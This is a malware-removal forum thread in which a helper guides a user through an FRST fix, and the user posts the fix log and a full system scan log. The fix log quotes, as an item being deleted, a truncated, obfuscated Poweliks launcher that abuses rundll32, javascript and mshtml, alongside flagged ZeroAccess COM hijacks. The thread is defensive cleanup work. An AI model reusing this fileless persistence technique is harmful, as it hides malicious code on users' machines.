  • Members
  • 19 posts
  • OFFLINE
  • Local time:09:05 AM

Posted 20 October 2014 - 06:32 PM

rkill logs before and after attached

Attached Files



#8 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 21 October 2014 - 01:25 PM

Please save all tools on your desktop.

First,
  • Please download the attached fixlist.txt file and save it to the same location as FRST
Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt, are in the same location, or the fix will not work.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run, please post it to your reply
Next,
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

Attached Files


~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.



#9 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  • Local time:09:05 AM

Posted 21 October 2014 - 09:28 PM

Here are the logs. The multiple processes of COM Surrogates that were piling up have stopped. Now just one or two popped up and shut down a couple times, now all quiet. I'm not sure if that's normal or what normal is with COM Surrogates.

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-10-2014
Ran by JP at 2014-10-21 20:48:57 Run:1
Running from C:\Users\JP\Desktop
Loaded Profile: JP (Available profiles: JP & JR)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKLM-x32\...\Run: [] => [X]
HKLM\...\InprocServer32: [Default-wbemess] wbemess.dll ATTENTION! ====> ZeroAccess?
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION!
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@
C:\Users\JP\AppData\Local\Temp\cabex.dll
C:\Users\JP\AppData\Local\Temp\dllnt_dump.dll
C:\Users\JP\AppData\Local\Temp\Quarantine.exe
C:\Users\JP\AppData\Local\Temp\sqlite3.dll
C:\Users\JP\AppData\Local\Temp\VARemove.exe
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll
EmptyTemp:
*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKLM\Software\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InprocServer32\\Default => Value was restored successfully.
HKLM\Software\Classes\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InprocServer32\\Default => Value was restored successfully.
"HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}" => Key deleted successfully.
"HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully.
"HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key deleted successfully.
"HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C} => value deleted successfully.
"HKCR\CLSID\{604BC32A-9680-40D1-9AC6-E06B23A1BA4C}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value deleted successfully.
"HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => Key not found.
"HKCR\PROTOCOLS\Handler\ipp\0x00000001" => Key deleted successfully.
"HKCR\CLSID\{E1D2BF42-A96B-11D1-9C6B-0000F875AC61}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec} => Moved successfully.
"C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@" => File/Directory not found.
C:\Users\JP\AppData\Local\Temp\cabex.dll => Moved successfully.
C:\Users\JP\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
C:\Users\JP\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\JP\AppData\Local\Temp\sqlite3.dll => Moved successfully.
C:\Users\JP\AppData\Local\Temp\VARemove.exe => Moved successfully.
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe => Moved successfully.
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
EmptyTemp: => Removed 3.5 GB temporary data.

The system needed a reboot.

==== End of Fixlog ====

--------------------------------

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 21-10-2014
Ran by JP (administrator) on JIM-PC on 21-10-2014 21:09:44
Running from C:\Users\JP\Desktop
Loaded Profile: JP (Available profiles: JP & JR)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(ANTS) C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe
() C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgnsa.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Speedbit Ltd.) C:\Program Files (x86)\DAP\DAP.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe
() C:\Program Files\Core Temp\Core Temp.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
(Research In Motion Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(CANON INC.) C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Novatel Wireless Inc.) C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2779024 2011-03-14] (CANON INC.)
HKLM-x32\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-03] (Intel Corporation)
HKLM-x32\...\Run: [57xxSteelVine] => C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe [1720320 2007-08-20] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard)
HKLM-x32\...\Run: [RIMBBLaunchAgent.exe] => C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe [90448 2011-09-01] (Research In Motion Limited)
HKLM-x32\...\Run: [AMD AVT] => C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe [10752 2012-01-31] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [641664 2012-04-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [413696 2009-01-05] (Apple Inc.)
HKLM-x32\...\Run: [CanonSolutionMenuEx] => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE [1612920 2011-08-04] (CANON INC.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-01-21] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SpybotSD TeaTimer] => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SansaDispatch] => C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [79872 2010-10-16] (SanDisk Corporation)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [DownloadAccelerator] => C:\Program Files (x86)\DAP\DAP.EXE [4242064 2014-10-04] (Speedbit Ltd.)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [NoSaveSettings] 0
Startup: C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Core Temp.lnk
ShortcutTarget: Core Temp.lnk -> C:\Program Files\Core Temp\Core Temp.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://duckduckgo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x410DF1D8953FCD01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll (Speedbit Ltd.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93}
DPF: HKLM-x32 {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab
DPF: HKLM-x32 {FA5D9BCA-4653-49FB-9237-FFA947877414} http://192.168.1.10/ZDVR.CAB
Handler: ipp - No CLSID Value -
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: ipp - No CLSID Value -
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 24.178.162.3 24.247.15.53

FireFox:
========
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll ()
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker
FF Extension: DAP Link Checker - C:\Program Files (x86)\DAP\daplinkchecker [2014-10-04]

Chrome:
=======
CHR Profile: C:\Users\JP\AppData\Local\Google\Chrome\User Data\Default

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 57xx SteelVine Manager; C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [1282048 2007-08-20] () [File not signed]
R2 AdobeActiveFileMonitor10.0; C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-01] (Adobe Systems Incorporated)
R2 AntsCMSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2403328 2013-03-07] (ANTS) [File not signed]
R2 AntsSTSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2038784 2013-03-02] () [File not signed]
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [4939312 2013-07-04] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [283136 2013-11-20] (AVG Technologies CZ, s.r.o.)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Media Toolbox 6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2011-06-20] (Hewlett-Packard Company) [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [276584 2009-11-06] (NVIDIA)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [117264 2009-10-20] (CACE Technologies, Inc.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
S2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 VZWConfigService; C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [218160 2012-04-16] (Novatel Wireless Inc.)
R2 MYSQL; "C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" MYSQL [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96768 2013-02-14] (Advanced Micro Devices) [File not signed]
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [246072 2013-11-25] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [71480 2013-07-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [206648 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [311608 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [116536 2013-07-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [45880 2013-10-23] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [240952 2014-04-15] (AVG Technologies CZ, s.r.o.)
R2 NPF; C:\Windows\System32\drivers\npf.sys [47632 2009-10-20] (CACE Technologies, Inc.)
R3 nvoclk64; C:\Windows\System32\DRIVERS\nvoclk64.sys [42088 2009-09-15] (NVIDIA Corp.)
S3 NwGPSOverWiFi64; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
S3 NWUSBLAN_4620; C:\Windows\System32\DRIVERS\nwblan_4620.sys [47472 2012-09-27] (Belcarra Technologies)
R3 nwusbserial; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
R3 PPorts; C:\Windows\System32\DRIVERS\PPorts.sys [95744 2009-07-23] ()
R3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 RivaTuner64; C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [19952 2010-01-06] ()
S3 Ser2ph; C:\Windows\System32\DRIVERS\ser2ph64.sys [89600 2008-03-06] (Prolific Technology Inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-20] ()
R3 ALSysIO; \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-21 21:08 - 2014-10-21 21:10 - 00018639 _____ () C:\Users\JP\Desktop\FRST.txt
2014-10-21 20:48 - 2014-10-21 20:48 - 00000000 ____D () C:\Users\JP\Desktop\FRST-OlderVersion
2014-10-21 20:45 - 2014-07-10 12:38 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\JP\Desktop\TDSSKiller.exe
2014-10-21 20:44 - 2014-10-21 20:48 - 02110976 _____ (Farbar) C:\Users\JP\Desktop\FRST64.exe
2014-10-21 20:44 - 2014-10-17 20:21 - 15725144 _____ () C:\Users\JP\Desktop\RogueKiller.exe
2014-10-20 18:16 - 2014-10-20 18:16 - 00002606 _____ () C:\Users\JP\Desktop\JRT.txt
2014-10-20 18:12 - 2014-10-20 18:12 - 00000000 ____D () C:\Windows\ERUNT
2014-10-20 17:38 - 2014-10-20 17:45 - 00000000 ____D () C:\AdwCleaner
2014-10-20 08:30 - 2014-10-21 21:09 - 00000000 ____D () C:\FRST
2014-10-18 22:06 - 2014-10-18 22:06 - 00000064 _____ () C:\Windows\GPlrLanc.dat
2014-10-18 15:21 - 2014-10-18 15:21 - 00018835 _____ () C:\Users\JP\Desktop\dds.txt
2014-10-18 15:21 - 2014-10-18 15:21 - 00017360 _____ () C:\Users\JP\Desktop\attach.txt
2014-10-18 00:12 - 2014-10-18 01:08 - 00000000 ____D () C:\Users\JP\AppData\Local\CrashDumps
2014-10-17 22:49 - 2014-10-17 22:50 - 00002428 _____ () C:\Users\JR\Desktop\Rkill.txt
2014-10-17 22:43 - 2014-10-17 22:43 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-10-17 22:42 - 2014-10-17 22:46 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
